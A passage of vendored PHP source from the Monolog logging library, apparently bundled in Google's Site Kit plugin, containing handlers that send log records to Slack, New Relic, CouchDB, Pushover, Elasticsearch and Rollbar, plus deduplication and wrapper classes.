with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord; /** * Sends notifications through Slack Webhooks * * @author Haralan Dobrev <hkdobrev@gmail.com> * @see https://api.slack.com/incoming-webhooks */ class SlackWebhookHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * Slack Webhook token * @var string */ private $webhookUrl; /** * Instance of the SlackRecord util class preparing data for Slack API. * @var SlackRecord */ private $slackRecord; /** * @param string $webhookUrl Slack Webhook URL * @param string|null $channel Slack channel (encoded ID or name) * @param string|null $username Name of a bot * @param bool $useAttachment Whether the message should be added to Slack as attachment (plain text otherwise) * @param string|null $iconEmoji The emoji name to use (or null) * @param bool $useShortAttachment Whether the the context/extra messages added to Slack as attachments are in a short style * @param bool $includeContextAndExtra Whether the attachment should include context and extra data * @param string[] $excludeFields Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] */ public function __construct(string $webhookUrl, ?string $channel = null, ?string $username = null, bool $useAttachment = \true, ?string $iconEmoji = null, bool $useShortAttachment = \false, bool $includeContextAndExtra = \false, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL, bool $bubble = \true, array $excludeFields = array()) { if (!\extension_loaded('curl')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The curl extension is needed to use the SlackWebhookHandler'); } parent::__construct($level, $bubble); $this->webhookUrl = $webhookUrl; $this->slackRecord = new \Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord($channel, $username, $useAttachment, $iconEmoji, $useShortAttachment, $includeContextAndExtra, $excludeFields); } public function getSlackRecord() : \Google\Site_Kit_Dependencies\Monolog\Handler\Slack\SlackRecord { return $this->slackRecord; } public function getWebhookUrl() : string { return $this->webhookUrl; } /** * {@inheritDoc} */ protected function write(array $record) : void { $postData = $this->slackRecord->getSlackData($record); $postString = \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($postData); $ch = \curl_init(); $options = array(\CURLOPT_URL => $this->webhookUrl, \CURLOPT_POST => \true, \CURLOPT_RETURNTRANSFER => \true, \CURLOPT_HTTPHEADER => array('Content-type: application/json'), \CURLOPT_POSTFIELDS => $postString); if (\defined('CURLOPT_SAFE_UPLOAD')) { $options[\CURLOPT_SAFE_UPLOAD] = \true; } \curl_setopt_array($ch, $options); \Google\Site_Kit_Dependencies\Monolog\Handler\Curl\Util::execute($ch); } public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { parent::setFormatter($formatter); $this->slackRecord->setFormatter($formatter); return $this; } public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { $formatter = parent::getFormatter(); $this->slackRecord->setFormatter($formatter); return $formatter; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * Class to record a log on a NewRelic application. * Enabling New Relic High Security mode may prevent capture of useful information. * * This handler requires a NormalizerFormatter to function and expects an array in $record['formatted'] * * @see https://docs.newrelic.com/docs/agents/php-agent * @see https://docs.newrelic.com/docs/accounts-partnerships/accounts/security/high-security */ class NewRelicHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * Name of the New Relic application that will receive logs from this handler. * * @var ?string */ protected $appName; /** * Name of the current transaction * * @var ?string */ protected $transactionName; /** * Some context and extra data is passed into the handler as arrays of values. Do we send them as is * (useful if we are using the API), or explode them for display on the NewRelic RPM website? * * @var bool */ protected $explodeArrays; /** * {@inheritDoc} * * @param string|null $appName * @param bool $explodeArrays * @param string|null $transactionName */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, bool $bubble = \true, ?string $appName = null, bool $explodeArrays = \false, ?string $transactionName = null) { parent::__construct($level, $bubble); $this->appName = $appName; $this->explodeArrays = $explodeArrays; $this->transactionName = $transactionName; } /** * {@inheritDoc} */ protected function write(array $record) : void { if (!$this->isNewRelicEnabled()) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('The newrelic PHP extension is required to use the NewRelicHandler'); } if ($appName = $this->getAppName($record['context'])) { $this->setNewRelicAppName($appName); } if ($transactionName = $this->getTransactionName($record['context'])) { $this->setNewRelicTransactionName($transactionName); unset($record['formatted']['context']['transaction_name']); } if (isset($record['context']['exception']) && $record['context']['exception'] instanceof \Throwable) { \newrelic_notice_error($record['message'], $record['context']['exception']); unset($record['formatted']['context']['exception']); } else { \newrelic_notice_error($record['message']); } if (isset($record['formatted']['context']) && \is_array($record['formatted']['context'])) { foreach ($record['formatted']['context'] as $key => $parameter) { if (\is_array($parameter) && $this->explodeArrays) { foreach ($parameter as $paramKey => $paramValue) { $this->setNewRelicParameter('context_' . $key . '_' . $paramKey, $paramValue); } } else { $this->setNewRelicParameter('context_' . $key, $parameter); } } } if (isset($record['formatted']['extra']) && \is_array($record['formatted']['extra'])) { foreach ($record['formatted']['extra'] as $key => $parameter) { if (\is_array($parameter) && $this->explodeArrays) { foreach ($parameter as $paramKey => $paramValue) { $this->setNewRelicParameter('extra_' . $key . '_' . $paramKey, $paramValue); } } else { $this->setNewRelicParameter('extra_' . $key, $parameter); } } } } /** * Checks whether the NewRelic extension is enabled in the system. * * @return bool */ protected function isNewRelicEnabled() : bool { return \extension_loaded('newrelic'); } /** * Returns the appname where this log should be sent. Each log can override the default appname, set in this * handler's constructor, by providing the appname in it's context. * * @param mixed[] $context */ protected function getAppName(array $context) : ?string { if (isset($context['appname'])) { return $context['appname']; } return $this->appName; } /** * Returns the name of the current transaction. Each log can override the default transaction name, set in this * handler's constructor, by providing the transaction_name in it's context * * @param mixed[] $context */ protected function getTransactionName(array $context) : ?string { if (isset($context['transaction_name'])) { return $context['transaction_name']; } return $this->transactionName; } /** * Sets the NewRelic application that should receive this log. */ protected function setNewRelicAppName(string $appName) : void { \newrelic_set_appname($appName); } /** * Overwrites the name of the current transaction */ protected function setNewRelicTransactionName(string $transactionName) : void { \newrelic_name_transaction($transactionName); } /** * @param string $key * @param mixed $value */ protected function setNewRelicParameter(string $key, $value) : void { if (null === $value || \is_scalar($value)) { \newrelic_add_custom_parameter($key, $value); } else { \newrelic_add_custom_parameter($key, \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($value, null, \true)); } } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; /** * Exception can be thrown if an extension for a handler is missing * * @author Christian Bergau <cbergau86@gmail.com> */ class MissingExtensionException extends \Exception { } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Doctrine\CouchDB\CouchDBClient; /** * CouchDB handler for Doctrine CouchDB ODM * * @author Markus Bachmann <markus.bachmann@bachi.biz> */ class DoctrineCouchDBHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var CouchDBClient */ private $client; public function __construct(\Google\Site_Kit_Dependencies\Doctrine\CouchDB\CouchDBClient $client, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { $this->client = $client; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->client->postDocument($record['formatted']); } protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter(); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Utils; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Sends notifications through the pushover api to mobile phones * * @author Sebastian Göttschkes <sebastian.goettschkes@googlemail.com> * @see https://www.pushover.net/api * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class PushoverHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\SocketHandler { /** @var string */ private $token; /** @var array<int|string> */ private $users; /** @var string */ private $title; /** @var string|int|null */ private $user = null; /** @var int */ private $retry; /** @var int */ private $expire; /** @var int */ private $highPriorityLevel; /** @var int */ private $emergencyLevel; /** @var bool */ private $useFormattedMessage = \false; /** * All parameters that can be sent to Pushover * @see https://pushover.net/api * @var array<string, bool> */ private $parameterNames = ['token' => \true, 'user' => \true, 'message' => \true, 'device' => \true, 'title' => \true, 'url' => \true, 'url_title' => \true, 'priority' => \true, 'timestamp' => \true, 'sound' => \true, 'retry' => \true, 'expire' => \true, 'callback' => \true]; /** * Sounds the api supports by default * @see https://pushover.net/api#sounds * @var string[] */ private $sounds = ['pushover', 'bike', 'bugle', 'cashregister', 'classical', 'cosmic', 'falling', 'gamelan', 'incoming', 'intermission', 'magic', 'mechanical', 'pianobar', 'siren', 'spacealarm', 'tugboat', 'alien', 'climb', 'persistent', 'echo', 'updown', 'none']; /** * @param string $token Pushover api token * @param string|array $users Pushover user id or array of ids the message will be sent to * @param string|null $title Title sent to the Pushover API * @param bool $useSSL Whether to connect via SSL. Required when pushing messages to users that are not * the pushover.net app owner. OpenSSL is required for this option. * @param string|int $highPriorityLevel The minimum logging level at which this handler will start * sending "high priority" requests to the Pushover API * @param string|int $emergencyLevel The minimum logging level at which this handler will start * sending "emergency" requests to the Pushover API * @param int $retry The retry parameter specifies how often (in seconds) the Pushover servers will * send the same notification to the user. * @param int $expire The expire parameter specifies how many seconds your notification will continue * to be retried for (every retry seconds). * * @phpstan-param string|array<int|string> $users * @phpstan-param Level|LevelName|LogLevel::* $highPriorityLevel * @phpstan-param Level|LevelName|LogLevel::* $emergencyLevel */ public function __construct(string $token, $users, ?string $title = null, $level = \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL, bool $bubble = \true, bool $useSSL = \true, $highPriorityLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::CRITICAL, $emergencyLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::EMERGENCY, int $retry = 30, int $expire = 25200, bool $persistent = \false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float $connectionTimeout = null, ?int $chunkSize = null) { $connectionString = $useSSL ? 'ssl://api.pushover.net:443' : 'api.pushover.net:80'; parent::__construct($connectionString, $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize); $this->token = $token; $this->users = (array) $users; $this->title = $title ?: (string) \gethostname(); $this->highPriorityLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($highPriorityLevel); $this->emergencyLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($emergencyLevel); $this->retry = $retry; $this->expire = $expire; } protected function generateDataStream(array $record) : string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * @phpstan-param FormattedRecord $record */ private function buildContent(array $record) : string { // Pushover has a limit of 512 characters on title and message combined. $maxMessageLength = 512 - \strlen($this->title); $message = $this->useFormattedMessage ? $record['formatted'] : $record['message']; $message = \Google\Site_Kit_Dependencies\Monolog\Utils::substr($message, 0, $maxMessageLength); $timestamp = $record['datetime']->getTimestamp(); $dataArray = ['token' => $this->token, 'user' => $this->user, 'message' => $message, 'title' => $this->title, 'timestamp' => $timestamp]; if (isset($record['level']) && $record['level'] >= $this->emergencyLevel) { $dataArray['priority'] = 2; $dataArray['retry'] = $this->retry; $dataArray['expire'] = $this->expire; } elseif (isset($record['level']) && $record['level'] >= $this->highPriorityLevel) { $dataArray['priority'] = 1; } // First determine the available parameters $context = \array_intersect_key($record['context'], $this->parameterNames); $extra = \array_intersect_key($record['extra'], $this->parameterNames); // Least important info should be merged with subsequent info $dataArray = \array_merge($extra, $context, $dataArray); // Only pass sounds that are supported by the API if (isset($dataArray['sound']) && !\in_array($dataArray['sound'], $this->sounds)) { unset($dataArray['sound']); } return \http_build_query($dataArray); } private function buildHeader(string $content) : string { $header = "POST /1/messages.json HTTP/1.1\r\n"; $header .= "Host: api.pushover.net\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . \strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } protected function write(array $record) : void { foreach ($this->users as $user) { $this->user = $user; parent::write($record); $this->closeSocket(); } $this->user = null; } /** * @param int|string $value * * @phpstan-param Level|LevelName|LogLevel::* $value */ public function setHighPriorityLevel($value) : self { $this->highPriorityLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($value); return $this; } /** * @param int|string $value * * @phpstan-param Level|LevelName|LogLevel::* $value */ public function setEmergencyLevel($value) : self { $this->emergencyLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($value); return $this; } /** * Use the formatted message? */ public function useFormattedMessage(bool $value) : self { $this->useFormattedMessage = $value; return $this; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Response\Elasticsearch; use Throwable; use RuntimeException; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticsearchFormatter; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Elasticsearch\Common\Exceptions\RuntimeException as ElasticsearchRuntimeException; use Google\Site_Kit_Dependencies\Elasticsearch\Client; use Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Exception\InvalidArgumentException as ElasticInvalidArgumentException; use Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Client as Client8; /** * Elasticsearch handler * * @link https://www.elastic.co/guide/en/elasticsearch/client/php-api/current/index.html * * Simple usage example: * * $client = \Elasticsearch\ClientBuilder::create() * ->setHosts($hosts) * ->build(); * * $options = array( * 'index' => 'elastic_index_name', * 'type' => 'elastic_doc_type', * ); * $handler = new ElasticsearchHandler($client, $options); * $log = new Logger('application'); * $log->pushHandler($handler); * * @author Avtandil Kikabidze <akalongman@gmail.com> */ class ElasticsearchHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * @var Client|Client8 */ protected $client; /** * @var mixed[] Handler config options */ protected $options = []; /** * @var bool */ private $needsType; /** * @param Client|Client8 $client Elasticsearch Client object * @param mixed[] $options Handler configuration */ public function __construct($client, array $options = [], $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!$client instanceof \Google\Site_Kit_Dependencies\Elasticsearch\Client && !$client instanceof \Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Client) { throw new \TypeError('Elasticsearch\\Client or Elastic\\Elasticsearch\\Client instance required'); } parent::__construct($level, $bubble); $this->client = $client; $this->options = \array_merge([ 'index' => 'monolog', // Elastic index name 'type' => '_doc', // Elastic document type 'ignore_error' => \false, ], $options); if ($client instanceof \Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Client || $client::VERSION[0] === '7') { $this->needsType = \false; // force the type to _doc for ES8/ES7 $this->options['type'] = '_doc'; } else { $this->needsType = \true; } } /** * {@inheritDoc} */ protected function write(array $record) : void { $this->bulkSend([$record['formatted']]); } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($formatter instanceof \Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticsearchFormatter) { return parent::setFormatter($formatter); } throw new \InvalidArgumentException('ElasticsearchHandler is only compatible with ElasticsearchFormatter'); } /** * Getter options * * @return mixed[] */ public function getOptions() : array { return $this->options; } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\ElasticsearchFormatter($this->options['index'], $this->options['type']); } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { $documents = $this->getFormatter()->formatBatch($records); $this->bulkSend($documents); } /** * Use Elasticsearch bulk API to send list of documents * * @param array[] $records Records + _index/_type keys * @throws \RuntimeException */ protected function bulkSend(array $records) : void { try { $params = ['body' => []]; foreach ($records as $record) { $params['body'][] = ['index' => $this->needsType ? ['_index' => $record['_index'], '_type' => $record['_type']] : ['_index' => $record['_index']]]; unset($record['_index'], $record['_type']); $params['body'][] = $record; } /** @var Elasticsearch */ $responses = $this->client->bulk($params); if ($responses['errors'] === \true) { throw $this->createExceptionFromResponses($responses); } } catch (\Throwable $e) { if (!$this->options['ignore_error']) { throw new \RuntimeException('Error sending messages to Elasticsearch', 0, $e); } } } /** * Creates elasticsearch exception from responses array * * Only the first error is converted into an exception. * * @param mixed[]|Elasticsearch $responses returned by $this->client->bulk() */ protected function createExceptionFromResponses($responses) : \Throwable { // @phpstan-ignore offsetAccess.nonOffsetAccessible foreach ($responses['items'] ?? [] as $item) { if (isset($item['index']['error'])) { return $this->createExceptionFromError($item['index']['error']); } } if (\class_exists(\Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Exception\InvalidArgumentException::class)) { return new \Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Exception\InvalidArgumentException('Elasticsearch failed to index one or more records.'); } return new \Google\Site_Kit_Dependencies\Elasticsearch\Common\Exceptions\RuntimeException('Elasticsearch failed to index one or more records.'); } /** * Creates elasticsearch exception from error array * * @param mixed[] $error */ protected function createExceptionFromError(array $error) : \Throwable { $previous = isset($error['caused_by']) ? $this->createExceptionFromError($error['caused_by']) : null; if (\class_exists(\Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Exception\InvalidArgumentException::class)) { return new \Google\Site_Kit_Dependencies\Elastic\Elasticsearch\Exception\InvalidArgumentException($error['type'] . ': ' . $error['reason'], 0, $previous); } return new \Google\Site_Kit_Dependencies\Elasticsearch\Common\Exceptions\RuntimeException($error['type'] . ': ' . $error['reason'], 0, $previous); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * CouchDB handler * * @author Markus Bachmann <markus.bachmann@bachi.biz> */ class CouchDBHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** @var mixed[] */ private $options; /** * @param mixed[] $options */ public function __construct(array $options = [], $level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { $this->options = \array_merge(['host' => 'localhost', 'port' => 5984, 'dbname' => 'logger', 'username' => null, 'password' => null], $options); parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record) : void { $basicAuth = null; if ($this->options['username']) { $basicAuth = \sprintf('%s:%s@', $this->options['username'], $this->options['password']); } $url = 'http://' . $basicAuth . $this->options['host'] . ':' . $this->options['port'] . '/' . $this->options['dbname']; $context = \stream_context_create(['http' => ['method' => 'POST', 'content' => $record['formatted'], 'ignore_errors' => \true, 'max_redirects' => 0, 'header' => 'Content-type: application/json']]); if (\false === @\file_get_contents($url, \false, $context)) { throw new \RuntimeException(\sprintf('Could not connect to %s', $url)); } } /** * {@inheritDoc} */ protected function getDefaultFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { return new \Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\JsonFormatter::BATCH_MODE_JSON, \false); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Simple handler wrapper that deduplicates log records across multiple requests * * It also includes the BufferHandler functionality and will buffer * all messages until the end of the request or flush() is called. * * This works by storing all log records' messages above $deduplicationLevel * to the file specified by $deduplicationStore. When further logs come in at the end of the * request (or when flush() is called), all those above $deduplicationLevel are checked * against the existing stored logs. If they match and the timestamps in the stored log is * not older than $time seconds, the new log record is discarded. If no log record is new, the * whole data set is discarded. * * This is mainly useful in combination with Mail handlers or things like Slack or HipChat handlers * that send messages to people, to avoid spamming with the same message over and over in case of * a major component failure like a database server being down which makes all requests fail in the * same way. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class DeduplicationHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\BufferHandler { /** * @var string */ protected $deduplicationStore; /** * @var Level */ protected $deduplicationLevel; /** * @var int */ protected $time; /** * @var bool */ private $gc = \false; /** * @param HandlerInterface $handler Handler. * @param string $deduplicationStore The file/path where the deduplication log should be kept * @param string|int $deduplicationLevel The minimum logging level for log records to be looked at for deduplication purposes * @param int $time The period (in seconds) during which duplicate entries should be suppressed after a given log is sent through * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::* $deduplicationLevel */ public function __construct(\Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface $handler, ?string $deduplicationStore = null, $deduplicationLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::ERROR, int $time = 60, bool $bubble = \true) { parent::__construct($handler, 0, \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, $bubble, \false); $this->deduplicationStore = $deduplicationStore === null ? \sys_get_temp_dir() . '/monolog-dedup-' . \substr(\md5(__FILE__), 0, 20) . '.log' : $deduplicationStore; $this->deduplicationLevel = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($deduplicationLevel); $this->time = $time; } public function flush() : void { if ($this->bufferSize === 0) { return; } $passthru = null; foreach ($this->buffer as $record) { if ($record['level'] >= $this->deduplicationLevel) { $passthru = $passthru || !$this->isDuplicate($record); if ($passthru) { $this->appendRecord($record); } } } // default of null is valid as well as if no record matches duplicationLevel we just pass through if ($passthru === \true || $passthru === null) { $this->handler->handleBatch($this->buffer); } $this->clear(); if ($this->gc) { $this->collectLogs(); } } /** * @phpstan-param Record $record */ private function isDuplicate(array $record) : bool { if (!\file_exists($this->deduplicationStore)) { return \false; } $store = \file($this->deduplicationStore, \FILE_IGNORE_NEW_LINES | \FILE_SKIP_EMPTY_LINES); if (!\is_array($store)) { return \false; } $yesterday = \time() - 86400; $timestampValidity = $record['datetime']->getTimestamp() - $this->time; $expectedMessage = \preg_replace('{[\\r\\n].*}', '', $record['message']); for ($i = \count($store) - 1; $i >= 0; $i--) { list($timestamp, $level, $message) = \explode(':', $store[$i], 3); if ($level === $record['level_name'] && $message === $expectedMessage && $timestamp > $timestampValidity) { return \true; } if ($timestamp < $yesterday) { $this->gc = \true; } } return \false; } private function collectLogs() : void { if (!\file_exists($this->deduplicationStore)) { return; } $handle = \fopen($this->deduplicationStore, 'rw+'); if (!$handle) { throw new \RuntimeException('Failed to open file for reading and writing: ' . $this->deduplicationStore); } \flock($handle, \LOCK_EX); $validLogs = []; $timestampValidity = \time() - $this->time; while (!\feof($handle)) { $log = \fgets($handle); if ($log && \substr($log, 0, 10) >= $timestampValidity) { $validLogs[] = $log; } } \ftruncate($handle, 0); \rewind($handle); foreach ($validLogs as $log) { \fwrite($handle, $log); } \flock($handle, \LOCK_UN); \fclose($handle); $this->gc = \false; } /** * @phpstan-param Record $record */ private function appendRecord(array $record) : void { \file_put_contents($this->deduplicationStore, $record['datetime']->getTimestamp() . ':' . $record['level_name'] . ':' . \preg_replace('{[\\r\\n].*}', '', $record['message']) . "\n", \FILE_APPEND); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; /** * This simple wrapper class can be used to extend handlers functionality. * * Example: A custom filtering that can be applied to any handler. * * Inherit from this class and override handle() like this: * * public function handle(array $record) * { * if ($record meets certain conditions) { * return false; * } * return $this->handler->handle($record); * } * * @author Alexey Karapetov <alexey@karapetov.com> */ class HandlerWrapper implements \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface { /** * @var HandlerInterface */ protected $handler; public function __construct(\Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface $handler) { $this->handler = $handler; } /** * {@inheritDoc} */ public function isHandling(array $record) : bool { return $this->handler->isHandling($record); } /** * {@inheritDoc} */ public function handle(array $record) : bool { return $this->handler->handle($record); } /** * {@inheritDoc} */ public function handleBatch(array $records) : void { $this->handler->handleBatch($records); } /** * {@inheritDoc} */ public function close() : void { $this->handler->close(); } /** * {@inheritDoc} */ public function pushProcessor(callable $callback) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface) { $this->handler->pushProcessor($callback); return $this; } throw new \LogicException('The wrapped handler does not implement ' . \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface::class); } /** * {@inheritDoc} */ public function popProcessor() : callable { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface) { return $this->handler->popProcessor(); } throw new \LogicException('The wrapped handler does not implement ' . \Google\Site_Kit_Dependencies\Monolog\Handler\ProcessableHandlerInterface::class); } /** * {@inheritDoc} */ public function setFormatter(\Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface $formatter) : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { $this->handler->setFormatter($formatter); return $this; } throw new \LogicException('The wrapped handler does not implement ' . \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface::class); } /** * {@inheritDoc} */ public function getFormatter() : \Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface) { return $this->handler->getFormatter(); } throw new \LogicException('The wrapped handler does not implement ' . \Google\Site_Kit_Dependencies\Monolog\Handler\FormattableHandlerInterface::class); } public function reset() { if ($this->handler instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $this->handler->reset(); } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Rollbar\RollbarLogger; use Throwable; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Sends errors to Rollbar * * If the context data contains a `payload` key, that is used as an array * of payload options to RollbarLogger's log method. * * Rollbar's context info will contain the context + extra keys from the log record * merged, and then on top of that a few keys: * * - level (rollbar level name) * - monolog_level (monolog level name, raw level, as rollbar only has 5 but monolog 8) * - channel * - datetime (unix timestamp) * * @author Paul Statezny <paulstatezny@gmail.com> */ class RollbarHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * @var RollbarLogger */ protected $rollbarLogger; /** @var string[] */ protected $levelMap = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => 'debug', \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => 'info', 